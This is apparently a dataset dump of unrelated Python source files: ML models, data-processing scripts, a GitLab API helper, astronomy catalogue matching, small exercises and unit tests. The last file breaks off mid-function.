text stringlengths 8 6.05M |
|---|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import os
def debugadapter_port_for_testing() -> int:
"""Return a unique-per-concurrent-process debug adapter port.
Use this in Pants's (and plugins') own tests to avoid collisions.
Assumes that the env var TEST_EXECUTION_SLOT has been set. If not, all tests
will use the same port, and collisions may occur.
"""
execution_slot = os.environ.get("TEST_EXECUTION_SLOT", "0")
return 22000 + int(execution_slot)
|
import tensorflow as tf
import numpy as np
import Config
class CNN(object):
"""
A CNN for text classification.
Uses an embedding layer, followed by a convolutional, max-pooling and softmax layer.
"""
def __init__(
self, sequence_length, num_classes, vocab_size,
embedding_size, filter_sizes, num_filters, l2_reg_lambda=0.0):
print "making place holders"
# Placeholders for input, output and dropout
self.input_x = tf.placeholder(tf.int32, [None, sequence_length], name="input_x")
self.input_y = tf.placeholder(tf.float32, [None,num_classes], name="input_y")
self.dropout_keep_prob = tf.placeholder(tf.float32, name="dropout_keep_prob")
# Keeping track of l2 regularization loss (optional)
l2_loss = tf.constant(0.0)
print "making embd layer"
# Embedding layer
with tf.device('/cpu:0'), tf.name_scope("embedding"):
self.W = tf.Variable(
tf.random_uniform([vocab_size, embedding_size], -1.0, 1.0),
name="W")
self.embedded_chars = tf.nn.embedding_lookup(self.W, self.input_x)
self.embedded_chars_expanded = tf.expand_dims(self.embedded_chars, -1)
# Create a convolution + maxpool layer for each filter size
print "making conv layer---training starting"
pooled_outputs = []
for i, filter_size in enumerate(filter_sizes):
with tf.name_scope("conv-maxpool-%s" % filter_size):
# Convolution Layer
filter_shape = [filter_size, embedding_size, 1, num_filters]
print "filter shape : ",filter_shape
W = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name="W")
print "W shape:"
# print tf.Session().run(W.get_shape())
b = tf.Variable(tf.constant(0.1, shape=[num_filters]), name="b")
print "b shape:"
# print tf.Session().run(b.get_shape())
# print "making conv layer"
conv = tf.nn.conv2d(
self.embedded_chars_expanded,
W,
strides=[1, 1, 1, 1],
padding="VALID",
name="conv")
# print "making relu layer"
# Apply nonlinearity
h = tf.nn.relu(tf.nn.bias_add(conv, b), name="relu")
# print "h is :",tf.Session().run(h.get_shape());
# print "making pooling layer"
# Maxpooling over the outputs
pooled = tf.nn.max_pool(
h,
ksize=[1, sequence_length - filter_size + 1, 1, 1],
strides=[1, 1, 1, 1],
padding='VALID',
name="pool")
pooled_outputs.append(pooled)
#print "Pooled shape :",tf.Session().run(pooled.get_shape());
print "combining pool funcs"
# Combine all the pooled features
num_filters_total = num_filters * len(filter_sizes)
print "num filtersssssssss:",num_filters_total
self.h_pool = tf.concat(pooled_outputs, 3)
# print "h pool shape : ",tf.Session().run(self.h_pool.get_shape())
self.h_pool_flat = tf.reshape(self.h_pool, [-1, num_filters_total])
# print "h pool flat shape : ",tf.Session().run(self.h_pool_flat.get_shape())
print "making dropout layer"
# Add dropout
with tf.name_scope("dropout"):
self.h_drop = tf.nn.dropout(self.h_pool_flat, self.dropout_keep_prob)
#print "dropout layer : ",tf.Session().run(self.h_drop.get_shape())
print "loss calculation"
# Final (unnormalized) scores and predictions
with tf.name_scope("output"):
W = tf.get_variable(
"W",
shape=[num_filters_total, num_classes],
initializer=tf.contrib.layers.xavier_initializer())
# print "output W shape : ",tf.Session().run(W.get_shape())
b = tf.Variable(tf.constant(0.1, shape=[num_classes]), name="b")
# print "output b shape : ",tf.Session().run(b.get_shape())
l2_loss += tf.nn.l2_loss(W)
l2_loss += tf.nn.l2_loss(b)
self.scores = tf.nn.xw_plus_b(self.h_drop, W, b, name="scores")
# print "output score shape : ",tf.Session().run(self.scores.get_shape())
self.predictions = tf.argmax(self.scores, 1, name="predictions")
# print "output pred shape : ",tf.Session().run(self.predictions.get_shape())
# Calculate mean cross-entropy loss
with tf.name_scope("loss"):
losses = tf.nn.softmax_cross_entropy_with_logits(logits=self.scores, labels=self.input_y)
self.loss = tf.reduce_mean(losses) + l2_reg_lambda * l2_loss
print "calc accuracy"
# Accuracy
with tf.name_scope("accuracy"):
correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))
self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, "float"), name="accuracy") |
import pymysql
import time
import os
import db_utils as dbutils
con = pymysql.connect(
host='127.0.0.1',
user='dbuser',
password='dbuserdbuser',
db='general-cia-test',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor
)
def insert_docs():
tone = time.time()
# for docno in range(1, 25):
#
# docno = str(docno)
#
# raw_ocr_path = "/Users/carriehaykellar/Desktop/HistoryLab/test-set/"
# raw_ocr = ""
#
# with open(raw_ocr_path + "CIA" + docno + ".txt", encoding='utf8',
# errors='ignore') as f:
# for lines in f:
# raw_ocr = raw_ocr + lines
#
# raw_ocr = raw_ocr.replace("'", "''")
#
# checked_ocr_path = "/Users/carriehaykellar/Desktop/HistoryLab/Spell-Checked/"
# checked_ocr = ""
# with open(checked_ocr_path + "SC_CIA" + docno + ".txt", encoding='utf8',
# errors='ignore') as f:
# for lines in f:
# checked_ocr = checked_ocr + lines
#
# checked_ocr = checked_ocr.replace("'", "''")
#
# url = "https://www.cia.gov/library/readingroom/document/" + docno
#
#
#
# sql = "insert into docs (docID, raw_doc, sc_doc, url) values ('" + \
# docno + "', '" + raw_ocr +"', '" + checked_ocr + "', '" + url + " ')"
#
# try:
# dbutils.run_q(sql, conn=con)
# except:
# print("already inserted")
#
#
rootdir = "/Users/carriehaykellar/Desktop/HistoryLab/meta/"
for subdir, dirs, files in os.walk(rootdir):
for file in files:
vals = []
with open(os.path.join(subdir, file), encoding='utf8', errors='ignore') as f:
for lines in f:
vals.append(lines)
dir = subdir.replace(rootdir, "")
vals.insert(0, dir)
tvals = tuple(c for c in vals)
sql_insert_meta = "insert into general-cia-test.metadata (folder, title, doctype, collection, docID, release_decis, origclass, pages, " \
"docrelease, doccreation, sequenceno, caseno, pubdate, contenttype) values " + str(tvals)
try:
dbutils.run_q(sql_insert_meta, conn=con)
except:
print("already inserted")
ttwo = time.time()
print( ttwo - tone)
insert_docs()
|
import pandas as pd
import numpy as np
from unidecode import unidecode
# <ADD ABBR TEAM NAMES>
column_names = ['team_name', 'opp_name', 'team_score', 'opp_score', 'team_roster', 'opp_roster', 'team_hrefs', 'opp_hrefs']
df_lineups = pd.read_csv('all-game-lineups.csv', comment='#', names=column_names)
df_team_names = pd.read_csv('team-names.csv', comment='#', names=['long','short'])
team_abbr = []
opp_abbr = []
err_count = 0
for index, row in df_lineups.iterrows():
team_index = df_team_names[df_team_names['long']==row['team_name']].index.values[0]
opp_index = df_team_names[df_team_names['long']==row['opp_name']].index.values[0]
if(team_index > -1 and opp_index > -1):
team_abbr.append(df_team_names.short[team_index])
opp_abbr.append(df_team_names.short[opp_index])
else:
err_count += 1
print(f"Team name not found. Index: {index}")
print(f"ERROR COUNT: {err_count}")
if (err_count == 0 and len(team_abbr) == len(df_lineups.team_name) and len(opp_abbr) == len(df_lineups.opp_name)):
df_lineups.drop(columns=['team_hrefs', 'opp_hrefs'], inplace=True)
df_lineups['team_abbr'] = team_abbr
df_lineups['opp_abbr'] = opp_abbr
df_lineups.to_csv('temp1.csv', index=False, header=False)
# </ADD ABBR TEAM NAMES>
# <ADD PLAYER OFFENSIVE STATS>
lineup_col_names = ['team_name', 'opp_name', 'team_score', 'opp_score', 'team_roster', 'opp_roster', 'team_abbr', 'opp_abbr']
df_lineups = pd.read_csv('all-game-lineups-abbr.csv', comment='#', names=lineup_col_names)
fielding_col_names = ['Tm','#Fld','RA/G','DefEff','G','GS','CG','Inn','Ch','PO','A','E','DP','Fld%','Rtot','Rtot/yr','Rdrs','Rdrs/yr','Rgood']
df_fielding_stats = pd.read_csv('all-team-fielding.csv', comment='#', names=fielding_col_names)
pitching_col_names = ['Tm','#P','PAge','RA/G','W','L','W-L%','ERA','G','GS','GF','CG','tSho','cSho','SV','IP','H','R','ER','HR','BB','IBB','SO','HBP','BK','WP','BF','ERA+','FIP','WHIP','H9','HR9','BB9','SO9','SO/W','LOB']
df_pitching_stats = pd.read_csv('all-team-pitching.csv', comment='#', names=pitching_col_names)
temp1_col_names = ['team_name','opp_name','team_score','opp_score','team_roster','opp_roster','team_abbr','opp_abbr','t_BA','t_OBP','t_SLG','t_OPS','t_OPSplus','t_GDP','t_HBP','t_SH','t_SF','t_IBB']
df_temp1 = pd.read_csv('temp1.csv', comment='#', names=temp1_col_names)
batting_col_names = ['Rk','Name','Age','Tm','Lg','G','PA','AB','R','H','2B','3B','HR','RBI','SB','CS','BB','SO','BA','OBP','SLG','OPS','OPSplus','TB','GDP','HBP','SH','SF','IBB','Pos Summary']
df_batting_stats = pd.read_csv('all-player-batting.csv', comment='#', names=batting_col_names)
err_count = 0
all_player_BA = []
all_player_OBP = []
all_player_SLG = []
all_player_OPS = []
all_player_OPS_plus = []
all_player_GDP = []
all_player_HBP = []
all_player_SH = []
all_player_SF = []
all_player_IBB = []
blank_players = []
for index, row in df_temp1.iterrows():
str1 = row['opp_roster'].replace(']','').replace('[','').replace("'",'')
team_roster = str1.replace('"','').split(",")
player_BA = []
player_OBP = []
player_SLG = []
player_OPS = []
player_OPS_plus = []
player_GDP = []
player_HBP = []
player_SH = []
player_SF = []
player_IBB = []
for i in range(len(team_roster)):
player_stat_index = -1
for stat_index, stat_row in df_batting_stats.iterrows():
player_name = unidecode(team_roster[i].replace('-',' ').replace('.','').replace("'",''))
if(player_name[0] == ' '):
player_name = player_name[1:]
if(player_name in unidecode(stat_row['Name'].replace('-',' ').replace('.','').replace("'",''))):
player_stat_index = stat_index
if(player_stat_index > -1):
player_BA.append(df_batting_stats.BA[player_stat_index])
player_OBP.append(df_batting_stats.OBP[player_stat_index])
player_SLG.append(df_batting_stats.SLG[player_stat_index])
player_OPS.append(df_batting_stats.OPS[player_stat_index])
player_OPS_plus.append(df_batting_stats.OPSplus[player_stat_index])
player_GDP.append(df_batting_stats.GDP[player_stat_index])
player_HBP.append(df_batting_stats.HBP[player_stat_index])
player_SH.append(df_batting_stats.SH[player_stat_index])
player_SF.append(df_batting_stats.SF[player_stat_index])
player_IBB.append(df_batting_stats.IBB[player_stat_index])
break
if(player_stat_index == -1):
err_count += 1
print(f"Player name not found in stats: {player_name}")
blank_players.append(player_name)
player_BA.append(0)
player_OBP.append(0)
player_SLG.append(0)
player_OPS.append(0)
player_OPS_plus.append(0)
player_GDP.append(0)
player_HBP.append(0)
player_SH.append(0)
player_SF.append(0)
player_IBB.append(0)
all_player_BA.append(player_BA)
all_player_OBP.append(player_OBP)
all_player_SLG.append(player_SLG)
all_player_OPS.append(player_OPS)
all_player_OPS_plus.append(player_OPS_plus)
all_player_GDP.append(player_GDP)
all_player_HBP.append(player_HBP)
all_player_SH.append(player_SH)
all_player_SF.append(player_SF)
all_player_IBB.append(player_IBB)
print(index)
# print(f"all_player_BA: {all_player_BA[:5]}")
print("DONE")
df_temp1['BA'] = all_player_BA
df_temp1['OBP'] = all_player_OBP
df_temp1['OPS'] = all_player_OPS
df_temp1['OPSplus'] = all_player_OPS_plus
df_temp1['GDP'] = all_player_GDP
df_temp1['HBP'] = all_player_HBP
df_temp1['SH'] = all_player_SH
df_temp1['SF'] = all_player_SF
df_temp1['IBB'] = all_player_IBB
df_temp1.to_csv('temp2.csv', index=False, header=False)
# </ADD PLAYER OFFENSIVE STATS>
# <ADD TEAM DEFENSIVE STATS>
temp2_col_names = ['team_name','opp_name','team_score','opp_score','team_roster','opp_roster','team_abbr','opp_abbr','t_BA','t_OBP','t_SLG','t_OPS','t_OPSplus','t_GDP','t_HBP','t_SH','t_SF','o_BA','o_OBP','o_SLG','o_OPS','o_OPSplus','o_GDP','o_HBP','o_SH','o_SF']
df_temp2 = pd.read_csv('temp2.csv', comment='#', names=temp2_col_names)
fielding_col_names = ['Tm','#Fld','RA/G','DefEff','G','GS','CG','Inn','Ch','PO','A','E','DP','Fld%','Rtot','Rtot/yr','Rdrs','Rdrs/yr','Rgood']
df_fielding_stats = pd.read_csv('all-team-fielding.csv', comment='#', names=fielding_col_names)
pitching_col_names = ['Tm','#P','PAge','RA/G','W','L','W-L%','ERA','G','GS','GF','CG','tSho','cSho','SV','IP','H','R','ER','HR','BB','IBB','SO','HBP','BK','WP','BF','ERA+','FIP','WHIP','H9','HR9','BB9','SO9','SO/W','LOB']
df_pitching_stats = pd.read_csv('all-team-pitching.csv', comment='#', names=pitching_col_names)
all_team_RA_per_G = []
all_team_ERA = []
all_opp_RA_per_G = []
all_opp_ERA = []
for index, row in df_temp2.iterrows():
for pitch_index, pitch_row in df_pitching_stats.iterrows():
if(row['team_abbr'] == pitch_row['Tm']):
all_team_RA_per_G.append(pitch_row['RA/G'])
all_team_ERA.append(pitch_row['ERA'])
elif(row['opp_abbr'] == pitch_row['Tm']):
all_opp_RA_per_G.append(pitch_row['RA/G'])
all_opp_ERA.append(pitch_row['ERA'])
print(index)
df_temp2['tm_RA/G'] = all_team_RA_per_G
df_temp2['tm_ERA'] = all_team_ERA
df_temp2['opp_RA/G'] = all_opp_RA_per_G
df_temp2['opp_ERA'] = all_opp_ERA
df_temp2.to_csv('temp3.csv', index=False)
# </ADD TEAM DEFENSIVE STATS>
# <SEPARATE TEAMS FROM OPPS>
temp3_col_names = ['team_name','opp_name','team_score','opp_score','team_roster','opp_roster','team_abbr','opp_abbr','t_BA','t_OBP','t_SLG','t_OPS','t_OPSplus','t_GDP','t_HBP','t_SH','t_SF','o_BA','o_OBP','o_SLG','o_OPS','o_OPSplus','o_GDP','o_HBP','o_SH','o_SF','tm_RA/G','tm_ERA','opp_RA/G','opp_ERA']
df_temp3 = pd.read_csv('temp3.csv', comment='#', names=temp3_col_names)
temp4_col_names = ['team_name','score','roster','abbr','t_BA','t_OBP','t_SLG','t_OPS','t_OPSplus','t_GDP','t_HBP','t_SH','t_SF','tm_RA/G','tm_ERA']
df_temp4 = pd.DataFrame(columns=temp4_col_names)
team_names = []
scores = []
rosters = []
abbrs = []
t_BAs = []
t_OBPs = []
t_SLGs = []
t_OPSs = []
t_OPSpluses = []
t_GDPs = []
t_HBPs = []
t_SHs = []
t_SFs = []
tm_RA_per_Gs = []
tm_ERAs = []
for index, row in df_temp3.iterrows():
team_names.append(row['team_name'])
scores.append(row['team_score'])
rosters.append(row['team_roster'])
abbrs.append(row['team_abbr'])
t_BAs.append(row['t_BA'])
t_OBPs.append(row['t_OBP'])
t_SLGs.append(row['t_SLG'])
t_OPSs.append(row['t_OPS'])
t_OPSpluses.append(row['t_OPSplus'])
t_GDPs.append(row['t_GDP'])
t_HBPs.append(row['t_HBP'])
t_SHs.append(row['t_SH'])
t_SFs.append(row['t_SF'])
tm_RA_per_Gs.append(row['tm_RA/G'])
tm_ERAs.append(row['tm_ERA'])
team_names.append(row['opp_name'])
scores.append(row['opp_score'])
rosters.append(row['opp_roster'])
abbrs.append(row['opp_abbr'])
t_BAs.append(row['o_BA'])
t_OBPs.append(row['o_OBP'])
t_SLGs.append(row['o_SLG'])
t_OPSs.append(row['o_OPS'])
t_OPSpluses.append(row['o_OPSplus'])
t_GDPs.append(row['o_GDP'])
t_HBPs.append(row['o_HBP'])
t_SHs.append(row['o_SH'])
t_SFs.append(row['o_SF'])
tm_RA_per_Gs.append(row['opp_RA/G'])
tm_ERAs.append(row['opp_ERA'])
df_temp4['team_name'] = team_names
df_temp4['score'] = scores
df_temp4['roster'] = rosters
df_temp4['abbr'] = abbrs
df_temp4['t_BA'] = t_BAs
df_temp4['t_OBP'] = t_OBPs
df_temp4['t_SLG'] = t_SLGs
df_temp4['t_OPS'] = t_OPSs
df_temp4['t_OPSplus'] = t_OPSpluses
df_temp4['t_GDP'] = t_GDPs
df_temp4['t_HBP'] = t_HBPs
df_temp4['t_SH'] = t_SHs
df_temp4['t_SF'] = t_SFs
df_temp4['tm_RA/G'] = tm_RA_per_Gs
df_temp4['tm_ERA'] = tm_ERAs
print(df_temp4.iloc[:5])
df_temp4.to_csv('temp4.csv', index=False)
# <SEPARATE ALL GAMES INTO 2 COLUMNS>
temp4_col_names = ['team_name','score','roster','abbr','t_BA','t_OBP','t_SLG','t_OPS','t_OPSplus','t_GDP','t_HBP','t_SH','t_SF','tm_RA/G','tm_ERA']
df_temp4 = pd.read_csv('temp4.csv', comment='#', names=temp4_col_names)
all_x = []
all_y = []
for index, row in df_temp4.iterrows():
temp_x = []
str1 = row['t_BA'].replace(']','').replace('[','').replace("'",'')
t_BA = str1.replace('"','').split(",")
for i in range(len(t_BA)):
temp_x.append(t_BA[i])
str1 = row['t_OBP'].replace(']','').replace('[','').replace("'",'')
t_OBP = str1.replace('"','').split(",")
for i in range(len(t_OBP)):
temp_x.append(t_OBP[i])
str1 = row['t_SLG'].replace(']','').replace('[','').replace("'",'')
t_SLG = str1.replace('"','').split(",")
for i in range(len(t_SLG)):
temp_x.append(t_SLG[i])
str1 = row['t_OPS'].replace(']','').replace('[','').replace("'",'')
t_OPS = str1.replace('"','').split(",")
for i in range(len(t_OPS)):
temp_x.append(t_OPS[i])
str1 = row['t_OPSplus'].replace(']','').replace('[','').replace("'",'')
t_OPSplus = str1.replace('"','').split(",")
for i in range(len(t_OPSplus)):
temp_x.append(t_OPSplus[i])
str1 = row['t_GDP'].replace(']','').replace('[','').replace("'",'')
t_GDP = str1.replace('"','').split(",")
for i in range(len(t_GDP)):
temp_x.append(t_GDP[i])
str1 = row['t_HBP'].replace(']','').replace('[','').replace("'",'')
t_HBP = str1.replace('"','').split(",")
for i in range(len(t_HBP)):
temp_x.append(t_HBP[i])
str1 = row['t_SH'].replace(']','').replace('[','').replace("'",'')
t_SH = str1.replace('"','').split(",")
for i in range(len(t_SH)):
temp_x.append(t_SH[i])
str1 = row['t_SF'].replace(']','').replace('[','').replace("'",'')
t_SF = str1.replace('"','').split(",")
for i in range(len(t_SF)):
temp_x.append(t_SF[i])
temp_x.append(row['tm_RA/G'])
temp_x.append(row['tm_ERA'])
print(index)
all_x.append(temp_x)
all_y.append(row['score'])
df_temp5 = pd.DataFrame(columns=['x','y'])
df_temp5['x'] = all_x
df_temp5['y'] = all_y
df_temp5.to_csv('temp5.csv', index=False)
# <\SEPARATE ALL GAMES INTO 2 COLUMNS>
# <ENSURE ALL DATA IS IN READABLE FORMAT>
df_temp5 = pd.read_csv('temp5.csv', comment='#', names=['x','y'])
x = []
for x_in in df_temp5.x:
temp_x = []
str1 = x_in.replace(']','').replace('[','').replace("'",'')
arr1 = str1.replace('"','').split(",")
for a in arr1:
temp_x.append(float(a))
x.append(temp_x)
y = []
for y_in in df_temp5.y:
y.append(float(y_in))
print(x[0])
print(x[0][0])
print(type(x[0][0]))
print(y[0])
print(type(y[0]))
df_temp5.x = x
df_temp5.y = y
# <\ENSURE ALL DATA IS IN READABLE FORMAT> |
#!/usr/bin/env python
import re
import wave
import os
from datetime import datetime
class WavFile:
"""
Provides convenience methods for `wave` operations.
"""
def __init__(self, location):
"""Ensure wav filname is parsable and set class properties"""
matches = re.match(r'.+?([NF])(\d{14})\.wav$', location)
if not matches:
raise Exception('Filename regex failed for %s' % location)
(ch, timestamp) = matches.groups()
if ch not in ('N', 'F'):
raise Exception('Invalid/missing channel')
self.location = location
self.channel = 'L' if ch == 'N' else 'R'
self.timestamp = datetime.strptime(timestamp, '%Y%m%d%H%M%S')
def open(self):
"""Open for reading with `wave`"""
return wave.open(self.location, 'r')
def length(self):
"""Get length in seconds"""
f = self.open()
return (f.getnframes() / f.getframerate()) / f.getnchannels()
def read_all(self):
"""Return all frames"""
f = self.open()
frames = f.readframes(f.getnframes())
return frames
def __str__(self):
return '%s [%s] [%s]' % (self.location, self.channel, self.timestamp)
class Silence:
"""
Provides `bytearray` of zeros sized according to `self.length()`
"""
def __init__(self, length, framerate):
self._length = length # in seconds
self.framerate = framerate # in fps
def length(self):
return self._length
def read_all(self):
# Two bytes per frame
return bytearray([0] * int(self.framerate * self.length()) * 2)
def wav_iter(files):
"""Iterate over `WavFiles` and provide `Silence` for gaps in audio"""
i = 0
yield files[i]
while i < len(files) - 1:
cur = files[i]
next = files[i + 1]
# Disregard subseconds since timestamp format doesn't allow for it
delta = (next.timestamp - cur.timestamp).seconds
if cur.length() < delta:
yield Silence(delta - cur.length(), cur.open().getframerate())
yield next
i = i + 1
def merge(wav_files, output_filename):
""" Merge mono files in sequence """
# Get output params from first file
params = wav_files[0].open().getparams()
# Build output file
output = wave.open(output_filename, 'w')
output.setparams(params)
# Sort by timestamp and merge to output in sequence
wav_files = sorted(wav_files, key=lambda w: w.timestamp)
for f in wav_iter(wav_files):
output.writeframes(f.read_all())
print('Merged to %s' % output_filename)
if __name__ == '__main__':
audiodir = './audio/'
left_fn = audiodir + 'left.wav'
right_fn = audiodir + 'right.wav'
# Remove any existing output
for x in (left_fn, right_fn):
if os.path.isfile(x):
os.remove(x)
# Create WavFile instances and separate left and right
wav_files = [WavFile(audiodir + f)
for f in os.listdir(audiodir) if f.endswith('.wav')]
left = [x for x in wav_files if x.channel == 'L']
right = [x for x in wav_files if x.channel == 'R']
# Merge and save files
merge(left, left_fn)
merge(right, right_fn)
|
A = int(input())
B = int(input())
C = int(input())
ca = A*B*C
Ca = str(ca)[::-1]
D = {'0':0, '1':0, '2':0, '3':0, '4':0, '5':0, '6':0, '7':0, '8':0, '9':0}
for i in Ca:
D[i] += 1
for j in D.keys():
print(D[j])
# Done |
"""
Goal:
* Get empty MRs.
* Empty means
- MR cannotbe merged.
- Mr has merge conflicts (accoring to the API result).
"""
import requests
import os
import sys
import logging
logging.basicConfig()
logger = logging.getLogger("EMPTY_MRS")
logger.setLevel(logging.INFO)
PROJECT_ID = os.environ.get("GITLAB_PROJECT_ID", None)
URL = os.environ.get("GITLAB_URL", None)
GITHUB_API_ENDPOINT = "/api/v4"
ISSUES_ENDPOINT = "/issues"
PROJECT_ENDPOINT = "/projects" + "/{project_id}"
MR_ENDPOINT = "/merge_requests"
MR_VERSION_ENDPOINT = "/{mr_iid}/versions"
TAGS_ENDPOINT = "/repository/tags"
PROJECT_TAGS_ENDPOINT = f"{PROJECT_ENDPOINT}" + f"{TAGS_ENDPOINT}"
CAN_BE_MERGED = "can_be_merged"
CANNOT_BE_MERGED = "cannot_be_merged"
def empty_mrs(url=URL, mr=None, headers=None):
mr_versions = list()
url = url + GITHUB_API_ENDPOINT
endpoint = ""
if mr["project_id"]:
endpoint = PROJECT_ENDPOINT.format(project_id=mr["project_id"])
complete_url = (
url + endpoint + MR_ENDPOINT + MR_VERSION_ENDPOINT.format(mr_iid=mr["iid"])
)
response = requests.get(url=complete_url, headers=headers)
if response.status_code not in [200, 201]:
return {
"error": "Cannot get merge request.",
"reason": "Received status code {response.status_code} with {response.text}.",
"url": complete_url,
}
sys.exit(1)
json_response = response.json()
logger.debug(json_response)
for version in json_response:
created_at = version.get("created_at", None)
real_size = version.get("real_size", None)
state = version.get("state", None)
mr_versions.append(
{
"created_at": created_at,
"real_size": real_size,
"state": state,
"web_url": mr["web_url"],
}
)
return mr_versions
|
from utils.utils import *
from utils.visualize import * |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 6 16:38:35 2018
@author: ppxee
"""
### Import Modules Required ###
from astropy.coordinates import match_coordinates_sky
from astropy.coordinates import SkyCoord
from astropy import units as u
from astropy.table import Table
from astropy.io import fits
#import sys
#import numpy as np
sem = '05B'#str(sys.argv[1]) #1st arguement from call is the semester
print(sem)
### read in fits_LDAC table and stars table ###
hdul = fits.open('star_stamps_tables/'+sem+'_star_stamps_table.fits', ignore_missing_end=True)
data = hdul[1].data
print('Read stamp table')
stars = Table.read('UDS_catalogues/DR11-secure-stars.fits')
print('Read stars table')
### Define coordinates ###
stampcoord = SkyCoord(data['ALPHA_J2000']*u.degree, data['DELTA_J2000']*u.degree)
starscoord = SkyCoord(stars['RA']*u.degree, stars['DEC']*u.degree)
print('Defined coordinates')
### Match catalogues and create new table ###
#idx, d2d , _ = match_coordinates_sky(starscoord, stampcoord) #match these 'good' stars to create table
idx = [2998]
starstamps = data[idx]
startb = fits.BinTableHDU.from_columns(starstamps)
startb.writeto('star_stamps_tables/test_'+sem+'_star_stamps_table.fits')
### old code ###
#data = Table.read('SE_stamp_outputs/small_'+sem+'_stamp_output.fits', ignore_missing_end=True)
#print('Read stamp table')
#stars = Table.read('UDS_catalogues/DR11-secure-stars.fits')
#print('Read stars table')
#
#### Define coordinates ###
#stampcoord = SkyCoord(data['ALPHA_J2000'], data['DELTA_J2000'])
#starscoord = SkyCoord(stars['RA']*u.degree, stars['DEC']*u.degree)
#print('Defined coordinates')
#
#### Match catalogues and create new table ###
#idx, d2d , _ = match_coordinates_sky(starscoord, stampcoord) #match these 'good' stars to create table
#starstamps = data[idx]
#
#starstamps.write('star_stamps_tables/small_'+sem+'_star_stamps_table.fits')
#-CATALOG_TYPE FITS_LDAC |
# Copyright 2023 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
"""Lightweight static analysis for many languages. Find bug variants with patterns that look like
source code.
See https://semgrep.dev/ for details.
"""
from __future__ import annotations
from typing import Iterable
from pants.backend.python.goals import lockfile as python_lockfile
from pants.backend.tools.semgrep import rules as semgrep_rules
from pants.backend.tools.semgrep import subsystem as subsystem
from pants.engine.rules import Rule
from pants.engine.unions import UnionRule
def rules() -> Iterable[Rule | UnionRule]:
return (
*semgrep_rules.rules(),
*subsystem.rules(),
*python_lockfile.rules(),
)
|
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
def creatTree(nodeList):
if nodeList[0] == None:
return None
head = TreeNode(nodeList[0])
Nodes = [head]
j = 1
for node in Nodes:
if node != None:
node.lchild = (TreeNode(nodeList[j]) if nodeList[j] != None else None)
Nodes.append(node.lchild)
j += 1
if j == len(nodeList):
return head
node.rchild = (TreeNode(nodeList[j]) if nodeList[j] != None else None)
j += 1
Nodes.append(node.rchild)
if j == len(nodeList):
return head
class Solution:
def levelOrder(self, root):
if root is None:
return []
res = []
queue = [root]
while queue:
level_nums = len(queue)
level_list = []
for i in range(level_nums):
cur = queue.pop()
level_list.append(cur.val)
if cur.left is not None:
queue.append(cur.left)
if cur.right is not None:
queue.append(cur.right)
res.append(level_list)
return res
if __name__ == '__main__':
arr = [1,1,3,4]
tree = creatTree(arr)
solu = Solution()
res = solu.levelOrder(tree)
|
# http testing
import sys
from urllib.request import Request, urlopen
from datetime import datetime
try:
url = 'http://192.168.1.11:8080/mysite3/gb/ajax'
request = Request(url)
response = urlopen(request)
response_body = response.read().decode('utf-8')
print(response_body)
except Exception as e:
print('%s : %s' % (e, datetime.now), file=sys.stderr)
|
friends = input().split(", ")
while True:
command = input()
if command == "Report":
break
command = command.split()
if command[0] == "Blacklist":
name = command[1]
if name in friends:
index = friends.index(name)
friends[index] = "Blacklisted"
print(f"{name} was blacklisted.")
else:
print(f"{name} was not found.")
elif command[0] == "Error":
index = int(command[1])
if friends[index] != "Blacklisted" and friends[index] != "Lost":
name = friends[index]
print(f"{name} was lost due to an error.")
friends[index] = "Lost"
elif command[0] == "Change":
index = int(command[1])
new_name = command[2]
if index in range(len(friends)):
print(f"{friends[index]} changed his username to {new_name}.")
friends[index] = new_name
blacklisted = "Blacklisted"
print(f"Blacklisted names: {friends.count(blacklisted)}")
lost = "Lost"
print(f"Lost names: {friends.count(lost)}")
print(" ".join(friends)) |
class Solution:
def prefixCount(self, words: List[str], pref: str) -> int:
res = 0
for item in words:
if len(item) < len(pref):
continue
if item[:len(pref)] == pref:
res += 1
return res |
import logging
import fmcapi
def test__ip_addresses(fmc):
logging.info("Test IPAddresses. This only returns a full list of IP object types.")
obj1 = fmcapi.NetworkAddresses(fmc=fmc)
logging.info("IPAddresses -->")
result = obj1.get()
logging.info(result)
logging.info("Test IPAddresses done.\n")
|
import os
import unittest
import sys
import cv2
import numpy
sys.path.insert(0, '..')
from detect import fetch_read_m3u8, extract_frame_from_video_url
class ResponseTestCase(unittest.TestCase):
def test_fetch_read_m3u8(self):
mock_link = "https://cdn-004.whatsupcams.com/hls/hr_novska01.m3u8"
mock_prefix = "https://cdn-004.whatsupcams.com/hls/"
response = fetch_read_m3u8(mock_link, mock_prefix)
print(response)
# results must contain 48 hourly_forecast)
self.assertIn(mock_prefix, response)
self.assertIn(".ts", response)
def test_extract_frame_from_video_url(self):
mock_link = "samples/hr_novska01-51104.ts"
response, frame = extract_frame_from_video_url(mock_link)
sample = cv2.imread("samples/frame_novska.jpg")
numpy.testing.assert_array_almost_equal(sample, frame,decimal=-2)
unittest.main()
|
from django.contrib import admin
# Register your models here.
from snippets.models import CourseUsers
@admin.register(CourseUsers)
class CourseUsersAdmin(admin.ModelAdmin):
list_display = ('id', 'course', 'owner')
|
import urlib.request, urlib.parse,urllib.error
import curl
import json
api_url='https://api.autopi.io'
|
'''
zhuliwen: liwenzhu@pku.edu.cn
October 24,2019
ref: https://blog.csdn.net/jacke121/article/details/85422244
https://github.com/kvfrans/feature-visualization
'''
import cv2
import numpy as np
import torch
from torch.autograd import Variable
from AI_homework_1 import ResNet, BasicBlock
import os
import matplotlib.pyplot as plt
import torch.nn as nn
def preprocess_image(cv2im, resize_im=True):
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
# Resize image
if resize_im:
cv2im = cv2.resize(cv2im, (224, 224))
im_as_arr = np.float32(cv2im)
im_as_arr = np.ascontiguousarray(im_as_arr[..., ::-1])
im_as_arr = im_as_arr.transpose(2, 0, 1) # Convert array to D,W,H
# Normalize the channels
for channel, _ in enumerate(im_as_arr):
im_as_arr[channel] /= 255
im_as_arr[channel] -= mean[channel]
